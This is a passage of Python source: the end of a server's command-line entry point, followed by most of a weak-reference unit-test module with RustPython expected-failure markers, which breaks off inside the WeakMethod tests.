            # Third argument may be a file holding the token, or the
            # token itself.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
                    # NOTE(review): the file contents are used verbatim and
                    # may include a trailing newline — confirm downstream
                    # auth tolerates this or whether .strip() is needed.
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    # Runs forever in this thread (port=0 would pick a free port).
    start_server(host=host, port=port)
    # print("Listening on port %s" % port)
    # httpd = make_server( host, port, application)
    #
    # httpd.serve_forever()
|
test_weakref.py | import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper
# Used in ReferencesTestCase.test_ref_created_during_del() .
# Holds a weakref created inside Target.__del__ so the test can observe it.
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
    """Minimal weak-referenceable class; ``method`` supplies a bound method."""
    def method(self):
        pass
class Callable:
    """Callable object that records the last argument it was invoked with."""
    # Last value passed to __call__; None until first invocation.
    bar = None
    def __call__(self, x):
        self.bar = x
def create_function():
    """Return a fresh plain function object (a weak-referenceable target)."""
    def f(): pass
    return f
def create_bound_method():
    """Return a bound method of a fresh C instance (weak-referenceable)."""
    return C().method
class Object:
    """Hashable value object used as a weak-reference target in tests.

    Equality, ordering and hashing all delegate to the wrapped ``arg``;
    comparisons against non-Object operands return NotImplemented so
    Python can fall back to its defaults.
    """
    def __init__(self, arg):
        self.arg = arg
    def __repr__(self):
        return "<Object %r>" % self.arg
    def __eq__(self, other):
        if not isinstance(other, Object):
            return NotImplemented
        return self.arg == other.arg
    def __lt__(self, other):
        if not isinstance(other, Object):
            return NotImplemented
        return self.arg < other.arg
    def __hash__(self):
        return hash(self.arg)
    def some_method(self):
        return 4
    def other_method(self):
        return 5
class RefCycle:
    """Object that is part of a reference cycle (self.cycle -> self)."""
    def __init__(self):
        self.cycle = self
class TestBase(unittest.TestCase):
    """Shared base: provides a counting weakref callback (``self.callback``)."""
    def setUp(self):
        # Number of times self.callback has fired during the test.
        self.cbcalled = 0
    def callback(self, ref):
        self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
    """
    Ensure GC collections happen in a different thread, at a high frequency.
    """
    stop_requested = False
    def collector():
        # Polls the closed-over flag, which is flipped in the finally
        # clause below once the managed block has finished.
        while not stop_requested:
            time.sleep(period)
            gc.collect()
    with support.disable_gc():
        collector_thread = threading.Thread(target=collector)
        collector_thread.start()
        try:
            yield
        finally:
            stop_requested = True
            collector_thread.join()
class ReferencesTestCase(TestBase):
    """Core behaviour tests for weakref.ref and weakref.proxy.

    Many of these tests are sensitive to exact refcount/GC timing, so the
    statement order inside each test is load-bearing and must not be
    rearranged.
    """
    def test_basic_ref(self):
        self.check_basic_ref(C)
        self.check_basic_ref(create_function)
        self.check_basic_ref(create_bound_method)
        # Just make sure the tp_repr handler doesn't raise an exception.
        # Live reference:
        o = C()
        wr = weakref.ref(o)
        repr(wr)
        # Dead reference:
        del o
        repr(wr)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_basic_callback(self):
        self.check_basic_callback(C)
        self.check_basic_callback(create_function)
        self.check_basic_callback(create_bound_method)
    @support.cpython_only
    def test_cfunction(self):
        import _testcapi
        create_cfunction = _testcapi.create_cfunction
        f = create_cfunction()
        wr = weakref.ref(f)
        self.assertIs(wr(), f)
        del f
        self.assertIsNone(wr())
        self.check_basic_ref(create_cfunction)
        self.check_basic_callback(create_cfunction)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_multiple_callbacks(self):
        o = C()
        ref1 = weakref.ref(o, self.callback)
        ref2 = weakref.ref(o, self.callback)
        del o
        self.assertIsNone(ref1(), "expected reference to be invalidated")
        self.assertIsNone(ref2(), "expected reference to be invalidated")
        self.assertEqual(self.cbcalled, 2,
                         "callback not called the right number of times")
    def test_multiple_selfref_callbacks(self):
        # Make sure all references are invalidated before callbacks are called
        #
        # What's important here is that we're using the first
        # reference in the callback invoked on the second reference
        # (the most recently created ref is cleaned up first). This
        # tests that all references to the object are invalidated
        # before any of the callbacks are invoked, so that we only
        # have one invocation of _weakref.c:cleanup_helper() active
        # for a particular object at a time.
        #
        def callback(object, self=self):
            self.ref()
        c = C()
        self.ref = weakref.ref(c, callback)
        ref1 = weakref.ref(c, callback)
        del c
    def test_constructor_kwargs(self):
        c = C()
        self.assertRaises(TypeError, weakref.ref, c, callback=None)
    @unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'Passed a callback to weakproxy, but weakproxy does not yet support proxies.'")
    def test_proxy_ref(self):
        o = C()
        o.bar = 1
        ref1 = weakref.proxy(o, self.callback)
        ref2 = weakref.proxy(o, self.callback)
        del o
        def check(proxy):
            proxy.bar
        self.assertRaises(ReferenceError, check, ref1)
        self.assertRaises(ReferenceError, check, ref2)
        self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
        self.assertEqual(self.cbcalled, 2)
    def check_basic_ref(self, factory):
        """A live weakref to factory()'s product must resolve to the object."""
        o = factory()
        ref = weakref.ref(o)
        self.assertIsNotNone(ref(),
                     "weak reference to live object should be live")
        o2 = ref()
        self.assertIs(o, o2,
                     "<ref>() should return original object if live")
    def check_basic_callback(self, factory):
        """Deleting the referent must fire the callback exactly once."""
        self.cbcalled = 0
        o = factory()
        ref = weakref.ref(o, self.callback)
        del o
        self.assertEqual(self.cbcalled, 1,
                         "callback did not properly set 'cbcalled'")
        self.assertIsNone(ref(),
                     "ref2 should be dead after deleting object reference")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_ref_reuse(self):
        o = C()
        ref1 = weakref.ref(o)
        # create a proxy to make sure that there's an intervening creation
        # between these two; it should make no difference
        proxy = weakref.proxy(o)
        ref2 = weakref.ref(o)
        self.assertIs(ref1, ref2,
                     "reference object w/out callback should be re-used")
        o = C()
        proxy = weakref.proxy(o)
        ref1 = weakref.ref(o)
        ref2 = weakref.ref(o)
        self.assertIs(ref1, ref2,
                     "reference object w/out callback should be re-used")
        self.assertEqual(weakref.getweakrefcount(o), 2,
                     "wrong weak ref count for object")
        del proxy
        self.assertEqual(weakref.getweakrefcount(o), 1,
                     "wrong weak ref count for object after deleting proxy")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_reuse(self):
        o = C()
        proxy1 = weakref.proxy(o)
        ref = weakref.ref(o)
        proxy2 = weakref.proxy(o)
        self.assertIs(proxy1, proxy2,
                     "proxy object w/out callback should have been re-used")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_basic_proxy(self):
        o = C()
        self.check_proxy(o, weakref.proxy(o))
        L = collections.UserList()
        p = weakref.proxy(L)
        self.assertFalse(p, "proxy for empty UserList should be false")
        p.append(12)
        self.assertEqual(len(L), 1)
        self.assertTrue(p, "proxy for non-empty UserList should be true")
        p[:] = [2, 3]
        self.assertEqual(len(L), 2)
        self.assertEqual(len(p), 2)
        self.assertIn(3, p, "proxy didn't support __contains__() properly")
        p[1] = 5
        self.assertEqual(L[1], 5)
        self.assertEqual(p[1], 5)
        L2 = collections.UserList(L)
        p2 = weakref.proxy(L2)
        self.assertEqual(p, p2)
        ## self.assertEqual(repr(L2), repr(p2))
        L3 = collections.UserList(range(10))
        p3 = weakref.proxy(L3)
        self.assertEqual(L3[:], p3[:])
        self.assertEqual(L3[5:], p3[5:])
        self.assertEqual(L3[:5], p3[:5])
        self.assertEqual(L3[2:5], p3[2:5])
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_unicode(self):
        # See bug 5037
        class C(object):
            def __str__(self):
                return "string"
            def __bytes__(self):
                return b"bytes"
        instance = C()
        self.assertIn("__bytes__", dir(weakref.proxy(instance)))
        self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_index(self):
        class C:
            def __index__(self):
                return 10
        o = C()
        p = weakref.proxy(o)
        self.assertEqual(operator.index(p), 10)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_div(self):
        class C:
            def __floordiv__(self, other):
                return 42
            def __ifloordiv__(self, other):
                return 21
        o = C()
        p = weakref.proxy(o)
        self.assertEqual(p // 5, 42)
        p //= 5
        self.assertEqual(p, 21)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_matmul(self):
        class C:
            def __matmul__(self, other):
                return 1729
            def __rmatmul__(self, other):
                return -163
            def __imatmul__(self, other):
                return 561
        o = C()
        p = weakref.proxy(o)
        self.assertEqual(p @ 5, 1729)
        self.assertEqual(5 @ p, -163)
        p @= 5
        self.assertEqual(p, 561)
    # The PyWeakref_* C API is documented as allowing either NULL or
    # None as the value for the callback, where either means "no
    # callback".  The "no callback" ref and proxy objects are supposed
    # to be shared so long as they exist by all callers so long as
    # they are active.  In Python 2.3.3 and earlier, this guarantee
    # was not honored, and was broken in different ways for
    # PyWeakref_NewRef() and PyWeakref_NewProxy().  (Two tests.)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_shared_ref_without_callback(self):
        self.check_shared_without_callback(weakref.ref)
    @unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'Passed a callback to weakproxy, but weakproxy does not yet support proxies.'")
    def test_shared_proxy_without_callback(self):
        self.check_shared_without_callback(weakref.proxy)
    def check_shared_without_callback(self, makeref):
        # Refs/proxies created with callback None or omitted must share
        # one object per referent, in every combination.
        o = Object(1)
        p1 = makeref(o, None)
        p2 = makeref(o, None)
        self.assertIs(p1, p2, "both callbacks were None in the C API")
        del p1, p2
        p1 = makeref(o)
        p2 = makeref(o, None)
        self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
        del p1, p2
        p1 = makeref(o)
        p2 = makeref(o)
        self.assertIs(p1, p2, "both callbacks were NULL in the C API")
        del p1, p2
        p1 = makeref(o, None)
        p2 = makeref(o)
        self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_callable_proxy(self):
        o = Callable()
        ref1 = weakref.proxy(o)
        self.check_proxy(o, ref1)
        self.assertIs(type(ref1), weakref.CallableProxyType,
                     "proxy is not of callable type")
        ref1('twinkies!')
        self.assertEqual(o.bar, 'twinkies!',
                     "call through proxy not passed through to original")
        ref1(x='Splat.')
        self.assertEqual(o.bar, 'Splat.',
                     "call through proxy not passed through to original")
        # expect due to too few args
        self.assertRaises(TypeError, ref1)
        # expect due to too many args
        self.assertRaises(TypeError, ref1, 1, 2, 3)
    def check_proxy(self, o, proxy):
        """Attribute reads/writes/deletes must pass through in both directions."""
        o.foo = 1
        self.assertEqual(proxy.foo, 1,
                         "proxy does not reflect attribute addition")
        o.foo = 2
        self.assertEqual(proxy.foo, 2,
                         "proxy does not reflect attribute modification")
        del o.foo
        self.assertFalse(hasattr(proxy, 'foo'),
                     "proxy does not reflect attribute removal")
        proxy.foo = 1
        self.assertEqual(o.foo, 1,
                         "object does not reflect attribute addition via proxy")
        proxy.foo = 2
        self.assertEqual(o.foo, 2,
                         "object does not reflect attribute modification via proxy")
        del proxy.foo
        self.assertFalse(hasattr(o, 'foo'),
                     "object does not reflect attribute removal via proxy")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_deletion(self):
        # Test clearing of SF bug #762891
        class Foo:
            result = None
            def __delitem__(self, accessor):
                self.result = accessor
        g = Foo()
        f = weakref.proxy(g)
        del f[0]
        self.assertEqual(f.result, 0)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_proxy_bool(self):
        # Test clearing of SF bug #1170766
        class List(list): pass
        lyst = List()
        self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
    def test_proxy_iter(self):
        # Test fails with a debug build of the interpreter
        # (see bpo-38395).
        obj = None
        class MyObj:
            def __iter__(self):
                nonlocal obj
                del obj
                return NotImplemented
        obj = MyObj()
        p = weakref.proxy(obj)
        with self.assertRaises(TypeError):
            # "blech" in p calls MyObj.__iter__ through the proxy,
            # without keeping a reference to the real object, so it
            # can be killed in the middle of the call
            "blech" in p
    @unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'Passed a callback to weakproxy, but weakproxy does not yet support proxies.'")
    def test_getweakrefcount(self):
        o = C()
        ref1 = weakref.ref(o)
        ref2 = weakref.ref(o, self.callback)
        self.assertEqual(weakref.getweakrefcount(o), 2,
                     "got wrong number of weak reference objects")
        proxy1 = weakref.proxy(o)
        proxy2 = weakref.proxy(o, self.callback)
        self.assertEqual(weakref.getweakrefcount(o), 4,
                     "got wrong number of weak reference objects")
        del ref1, ref2, proxy1, proxy2
        self.assertEqual(weakref.getweakrefcount(o), 0,
                     "weak reference objects not unlinked from"
                     " referent when discarded.")
        # assumes ints do not support weakrefs
        self.assertEqual(weakref.getweakrefcount(1), 0,
                     "got wrong number of weak reference objects for int")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_getweakrefs(self):
        o = C()
        ref1 = weakref.ref(o, self.callback)
        ref2 = weakref.ref(o, self.callback)
        del ref1
        self.assertEqual(weakref.getweakrefs(o), [ref2],
                     "list of refs does not match")
        o = C()
        ref1 = weakref.ref(o, self.callback)
        ref2 = weakref.ref(o, self.callback)
        del ref2
        self.assertEqual(weakref.getweakrefs(o), [ref1],
                     "list of refs does not match")
        del ref1
        self.assertEqual(weakref.getweakrefs(o), [],
                     "list of refs not cleared")
        # assumes ints do not support weakrefs
        self.assertEqual(weakref.getweakrefs(1), [],
                     "list of refs does not match for int")
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_newstyle_number_ops(self):
        class F(float):
            pass
        f = F(2.0)
        p = weakref.proxy(f)
        self.assertEqual(p + 1.0, 3.0)
        self.assertEqual(1.0 + p, 3.0)  # this used to SEGV
    def test_callbacks_protected(self):
        # Callbacks protected from already-set exceptions?
        # Regression test for SF bug #478534.
        class BogusError(Exception):
            pass
        data = {}
        def remove(k):
            del data[k]
        def encapsulate():
            f = lambda : ()
            data[weakref.ref(f, remove)] = None
            raise BogusError
        try:
            encapsulate()
        except BogusError:
            pass
        else:
            self.fail("exception not properly restored")
        try:
            encapsulate()
        except BogusError:
            pass
        else:
            self.fail("exception not properly restored")
    def test_sf_bug_840829(self):
        # "weakref callbacks and gc corrupt memory"
        # subtype_dealloc erroneously exposed a new-style instance
        # already in the process of getting deallocated to gc,
        # causing double-deallocation if the instance had a weakref
        # callback that triggered gc.
        # If the bug exists, there probably won't be an obvious symptom
        # in a release build.  In a debug build, a segfault will occur
        # when the second attempt to remove the instance from the "list
        # of all objects" occurs.
        import gc
        class C(object):
            pass
        c = C()
        wr = weakref.ref(c, lambda ignore: gc.collect())
        del c
        # There endeth the first part.  It gets worse.
        del wr
        c1 = C()
        c1.i = C()
        wr = weakref.ref(c1.i, lambda ignore: gc.collect())
        c2 = C()
        c2.c1 = c1
        del c1  # still alive because c2 points to it
        # Now when subtype_dealloc gets called on c2, it's not enough just
        # that c2 is immune from gc while the weakref callbacks associated
        # with c2 execute (there are none in this 2nd half of the test, btw).
        # subtype_dealloc goes on to call the base classes' deallocs too,
        # so any gc triggered by weakref callbacks associated with anything
        # torn down by a base class dealloc can also trigger double
        # deallocation of c2.
        del c2
    def test_callback_in_cycle_1(self):
        import gc
        class J(object):
            pass
        class II(object):
            def acallback(self, ignore):
                self.J
        I = II()
        I.J = J
        I.wr = weakref.ref(J, I.acallback)
        # Now J and II are each in a self-cycle (as all new-style class
        # objects are, since their __mro__ points back to them).  I holds
        # both a weak reference (I.wr) and a strong reference (I.J) to class
        # J.  I is also in a cycle (I.wr points to a weakref that references
        # I.acallback).  When we del these three, they all become trash, but
        # the cycles prevent any of them from getting cleaned up immediately.
        # Instead they have to wait for cyclic gc to deduce that they're
        # trash.
        #
        # gc used to call tp_clear on all of them, and the order in which
        # it does that is pretty accidental.  The exact order in which we
        # built up these things manages to provoke gc into running tp_clear
        # in just the right order (I last).  Calling tp_clear on II leaves
        # behind an insane class object (its __mro__ becomes NULL).  Calling
        # tp_clear on J breaks its self-cycle, but J doesn't get deleted
        # just then because of the strong reference from I.J.  Calling
        # tp_clear on I starts to clear I's __dict__, and just happens to
        # clear I.J first -- I.wr is still intact.  That removes the last
        # reference to J, which triggers the weakref callback.  The callback
        # tries to do "self.J", and instances of new-style classes look up
        # attributes ("J") in the class dict first.  The class (II) wants to
        # search II.__mro__, but that's NULL.   The result was a segfault in
        # a release build, and an assert failure in a debug build.
        del I, J, II
        gc.collect()
    def test_callback_in_cycle_2(self):
        import gc
        # This is just like test_callback_in_cycle_1, except that II is an
        # old-style class.  The symptom is different then:  an instance of an
        # old-style class looks in its own __dict__ first.  'J' happens to
        # get cleared from I.__dict__ before 'wr', and 'J' was never in II's
        # __dict__, so the attribute isn't found.  The difference is that
        # the old-style II doesn't have a NULL __mro__ (it doesn't have any
        # __mro__), so no segfault occurs.  Instead it got:
        #    test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
        #    Exception exceptions.AttributeError:
        #   "II instance has no attribute 'J'" in <bound method II.acallback
        #       of <?.II instance at 0x00B9B4B8>> ignored
        class J(object):
            pass
        class II:
            def acallback(self, ignore):
                self.J
        I = II()
        I.J = J
        I.wr = weakref.ref(J, I.acallback)
        del I, J, II
        gc.collect()
    def test_callback_in_cycle_3(self):
        import gc
        # This one broke the first patch that fixed the last two.  In this
        # case, the objects reachable from the callback aren't also reachable
        # from the object (c1) *triggering* the callback:  you can get to
        # c1 from c2, but not vice-versa.  The result was that c2's __dict__
        # got tp_clear'ed by the time the c2.cb callback got invoked.
        class C:
            def cb(self, ignore):
                self.me
                self.c1
                self.wr
        c1, c2 = C(), C()
        c2.me = c2
        c2.c1 = c1
        c2.wr = weakref.ref(c1, c2.cb)
        del c1, c2
        gc.collect()
    def test_callback_in_cycle_4(self):
        import gc
        # Like test_callback_in_cycle_3, except c2 and c1 have different
        # classes.  c2's class (C) isn't reachable from c1 then, so protecting
        # objects reachable from the dying object (c1) isn't enough to stop
        # c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
        # The result was a segfault (C.__mro__ was NULL when the callback
        # tried to look up self.me).
        class C(object):
            def cb(self, ignore):
                self.me
                self.c1
                self.wr
        class D:
            pass
        c1, c2 = D(), C()
        c2.me = c2
        c2.c1 = c1
        c2.wr = weakref.ref(c1, c2.cb)
        del c1, c2, C, D
        gc.collect()
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    @support.requires_type_collecting
    def test_callback_in_cycle_resurrection(self):
        import gc
        # Do something nasty in a weakref callback:  resurrect objects
        # from dead cycles.  For this to be attempted, the weakref and
        # its callback must also be part of the cyclic trash (else the
        # objects reachable via the callback couldn't be in cyclic trash
        # to begin with -- the callback would act like an external root).
        # But gc clears trash weakrefs with callbacks early now, which
        # disables the callbacks, so the callbacks shouldn't get called
        # at all (and so nothing actually gets resurrected).
        alist = []
        class C(object):
            def __init__(self, value):
                self.attribute = value
            def acallback(self, ignore):
                alist.append(self.c)
        c1, c2 = C(1), C(2)
        c1.c = c2
        c2.c = c1
        c1.wr = weakref.ref(c2, c1.acallback)
        c2.wr = weakref.ref(c1, c2.acallback)
        def C_went_away(ignore):
            alist.append("C went away")
        wr = weakref.ref(C, C_went_away)
        del c1, c2, C   # make them all trash
        self.assertEqual(alist, [])  # del isn't enough to reclaim anything
        gc.collect()
        # c1.wr and c2.wr were part of the cyclic trash, so should have
        # been cleared without their callbacks executing.  OTOH, the weakref
        # to C is bound to a function local (wr), and wasn't trash, so that
        # callback should have been invoked when C went away.
        self.assertEqual(alist, ["C went away"])
        # The remaining weakref should be dead now (its callback ran).
        self.assertEqual(wr(), None)
        del alist[:]
        gc.collect()
        self.assertEqual(alist, [])
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_callbacks_on_callback(self):
        import gc
        # Set up weakref callbacks *on* weakref callbacks.
        alist = []
        def safe_callback(ignore):
            alist.append("safe_callback called")
        class C(object):
            def cb(self, ignore):
                alist.append("cb called")
        c, d = C(), C()
        c.other = d
        d.other = c
        callback = c.cb
        c.wr = weakref.ref(d, callback)     # this won't trigger
        d.wr = weakref.ref(callback, d.cb)  # ditto
        external_wr = weakref.ref(callback, safe_callback)  # but this will
        self.assertIs(external_wr(), callback)
        # The weakrefs attached to c and d should get cleared, so that
        # C.cb is never called.  But external_wr isn't part of the cyclic
        # trash, and no cyclic trash is reachable from it, so safe_callback
        # should get invoked when the bound method object callback (c.cb)
        # -- which is itself a callback, and also part of the cyclic trash --
        # gets reclaimed at the end of gc.
        del callback, c, d, C
        self.assertEqual(alist, [])  # del isn't enough to clean up cycles
        gc.collect()
        self.assertEqual(alist, ["safe_callback called"])
        self.assertEqual(external_wr(), None)
        del alist[:]
        gc.collect()
        self.assertEqual(alist, [])
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_gc_during_ref_creation(self):
        self.check_gc_during_creation(weakref.ref)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_gc_during_proxy_creation(self):
        self.check_gc_during_creation(weakref.proxy)
    def check_gc_during_creation(self, makeref):
        # Force aggressive collection thresholds so gc runs while the
        # weakref is being constructed; restore them afterwards.
        thresholds = gc.get_threshold()
        gc.set_threshold(1, 1, 1)
        gc.collect()
        class A:
            pass
        def callback(*args):
            pass
        referenced = A()
        a = A()
        a.a = a
        a.wr = makeref(referenced)
        try:
            # now make sure the object and the ref get labeled as
            # cyclic trash:
            a = A()
            weakref.ref(referenced, callback)
        finally:
            gc.set_threshold(*thresholds)
    def test_ref_created_during_del(self):
        # Bug #1377858
        # A weakref created in an object's __del__() would crash the
        # interpreter when the weakref was cleaned up since it would refer to
        # non-existent memory.  This test should not segfault the interpreter.
        class Target(object):
            def __del__(self):
                global ref_from_del
                ref_from_del = weakref.ref(self)
        w = Target()
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_init(self):
        # Issue 3634
        # <weakref to class>.__init__() doesn't check errors correctly
        r = weakref.ref(Exception)
        self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
        # No exception should be raised here
        gc.collect()
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_classes(self):
        # Check that classes are weakrefable.
        class A(object):
            pass
        l = []
        weakref.ref(int)
        a = weakref.ref(A, l.append)
        A = None
        gc.collect()
        self.assertEqual(a(), None)
        self.assertEqual(l, [a])
    def test_equality(self):
        # Alive weakrefs defer equality testing to their underlying object.
        x = Object(1)
        y = Object(1)
        z = Object(2)
        a = weakref.ref(x)
        b = weakref.ref(y)
        c = weakref.ref(z)
        d = weakref.ref(x)
        # Note how we directly test the operators here, to stress both
        # __eq__ and __ne__.
        self.assertTrue(a == b)
        self.assertFalse(a != b)
        self.assertFalse(a == c)
        self.assertTrue(a != c)
        self.assertTrue(a == d)
        self.assertFalse(a != d)
        del x, y, z
        gc.collect()
        for r in a, b, c:
            # Sanity check
            self.assertIs(r(), None)
        # Dead weakrefs compare by identity: whether `a` and `d` are the
        # same weakref object is an implementation detail, since they pointed
        # to the same original object and didn't have a callback.
        # (see issue #16453).
        self.assertFalse(a == b)
        self.assertTrue(a != b)
        self.assertFalse(a == c)
        self.assertTrue(a != c)
        self.assertEqual(a == d, a is d)
        self.assertEqual(a != d, a is not d)
    def test_ordering(self):
        # weakrefs cannot be ordered, even if the underlying objects can.
        ops = [operator.lt, operator.gt, operator.le, operator.ge]
        x = Object(1)
        y = Object(1)
        a = weakref.ref(x)
        b = weakref.ref(y)
        for op in ops:
            self.assertRaises(TypeError, op, a, b)
        # Same when dead.
        del x, y
        gc.collect()
        for op in ops:
            self.assertRaises(TypeError, op, a, b)
    def test_hashing(self):
        # Alive weakrefs hash the same as the underlying object
        x = Object(42)
        y = Object(42)
        a = weakref.ref(x)
        b = weakref.ref(y)
        self.assertEqual(hash(a), hash(42))
        del x, y
        gc.collect()
        # Dead weakrefs:
        # - retain their hash is they were hashed when alive;
        # - otherwise, cannot be hashed.
        self.assertEqual(hash(a), hash(42))
        self.assertRaises(TypeError, hash, b)
    def test_trashcan_16602(self):
        # Issue #16602: when a weakref's target was part of a long
        # deallocation chain, the trashcan mechanism could delay clearing
        # of the weakref and make the target object visible from outside
        # code even though its refcount had dropped to 0.  A crash ensued.
        class C:
            def __init__(self, parent):
                if not parent:
                    return
                wself = weakref.ref(self)
                def cb(wparent):
                    o = wself()
                self.wparent = weakref.ref(parent, cb)
        d = weakref.WeakKeyDictionary()
        root = c = C(None)
        for n in range(100):
            d[c] = c = C(c)
        del root
        gc.collect()
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_callback_attribute(self):
        x = Object(1)
        callback = lambda ref: None
        ref1 = weakref.ref(x, callback)
        self.assertIs(ref1.__callback__, callback)
        ref2 = weakref.ref(x)
        self.assertIsNone(ref2.__callback__)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_callback_attribute_after_deletion(self):
        x = Object(1)
        ref = weakref.ref(x, self.callback)
        self.assertIsNotNone(ref.__callback__)
        del x
        support.gc_collect()
        self.assertIsNone(ref.__callback__)
    def test_set_callback_attribute(self):
        x = Object(1)
        callback = lambda ref: None
        ref1 = weakref.ref(x, callback)
        with self.assertRaises(AttributeError):
            ref1.__callback__ = lambda ref: None
    def test_callback_gcs(self):
        class ObjectWithDel(Object):
            def __del__(self): pass
        x = ObjectWithDel(1)
        ref1 = weakref.ref(x, lambda ref: support.gc_collect())
        del x
        support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
    """Tests for subclasses of weakref.ref: extra attributes, __slots__,
    and the rule that subclass refs are never shared with plain refs."""
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_subclass_refs(self):
        class MyRef(weakref.ref):
            def __init__(self, ob, callback=None, value=42):
                self.value = value
                super().__init__(ob, callback)
            def __call__(self):
                self.called = True
                return super().__call__()
        o = Object("foo")
        mr = MyRef(o, value=24)
        self.assertIs(mr(), o)
        self.assertTrue(mr.called)
        self.assertEqual(mr.value, 24)
        del o
        self.assertIsNone(mr())
        self.assertTrue(mr.called)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_subclass_refs_dont_replace_standard_refs(self):
        class MyRef(weakref.ref):
            pass
        o = Object(42)
        r1 = MyRef(o)
        r2 = weakref.ref(o)
        self.assertIsNot(r1, r2)
        self.assertEqual(weakref.getweakrefs(o), [r2, r1])
        self.assertEqual(weakref.getweakrefcount(o), 2)
        r3 = MyRef(o)
        self.assertEqual(weakref.getweakrefcount(o), 3)
        refs = weakref.getweakrefs(o)
        self.assertEqual(len(refs), 3)
        self.assertIs(r2, refs[0])
        self.assertIn(r1, refs[1:])
        self.assertIn(r3, refs[1:])
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_subclass_refs_dont_conflate_callbacks(self):
        class MyRef(weakref.ref):
            pass
        o = Object(42)
        r1 = MyRef(o, id)
        r2 = MyRef(o, str)
        self.assertIsNot(r1, r2)
        refs = weakref.getweakrefs(o)
        self.assertIn(r1, refs)
        self.assertIn(r2, refs)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_subclass_refs_with_slots(self):
        class MyRef(weakref.ref):
            __slots__ = "slot1", "slot2"
            def __new__(type, ob, callback, slot1, slot2):
                return weakref.ref.__new__(type, ob, callback)
            def __init__(self, ob, callback, slot1, slot2):
                self.slot1 = slot1
                self.slot2 = slot2
            def meth(self):
                return self.slot1 + self.slot2
        o = Object(42)
        r = MyRef(o, None, "abc", "def")
        self.assertEqual(r.slot1, "abc")
        self.assertEqual(r.slot2, "def")
        self.assertEqual(r.meth(), "abcdef")
        self.assertFalse(hasattr(r, "__dict__"))
    def test_subclass_refs_with_cycle(self):
        """Confirm https://bugs.python.org/issue3100 is fixed."""
        # An instance of a weakref subclass can have attributes.
        # If such a weakref holds the only strong reference to the object,
        # deleting the weakref will delete the object. In this case,
        # the callback must not be called, because the ref object is
        # being deleted.
        class MyRef(weakref.ref):
            pass
        # Use a local callback, for "regrtest -R::"
        # to detect refcounting problems
        def callback(w):
            self.cbcalled += 1
        o = C()
        r1 = MyRef(o, callback)
        r1.o = o
        del o
        del r1 # Used to crash here
        self.assertEqual(self.cbcalled, 0)
        # Same test, with two weakrefs to the same object
        # (since code paths are different)
        o = C()
        r1 = MyRef(o, callback)
        r2 = MyRef(o, callback)
        r1.r = r2
        r2.o = o
        del o
        del r2
        del r1 # Used to crash here
        self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
    """Tests for weakref.WeakMethod: weak references to bound methods."""

    def _subclass(self):
        """Return an Object subclass overriding `some_method`."""
        class C(Object):
            def some_method(self):
                return 6
        return C

    def test_alive(self):
        # A live WeakMethod dereferences to an equivalent bound method.
        o = Object(1)
        r = weakref.WeakMethod(o.some_method)
        self.assertIsInstance(r, weakref.ReferenceType)
        self.assertIsInstance(r(), type(o.some_method))
        self.assertIs(r().__self__, o)
        self.assertIs(r().__func__, o.some_method.__func__)
        self.assertEqual(r()(), 4)

    def test_object_dead(self):
        # The WeakMethod dies when the instance dies.
        o = Object(1)
        r = weakref.WeakMethod(o.some_method)
        del o
        gc.collect()
        self.assertIs(r(), None)

    def test_method_dead(self):
        # The WeakMethod also dies when the underlying function dies.
        C = self._subclass()
        o = C(1)
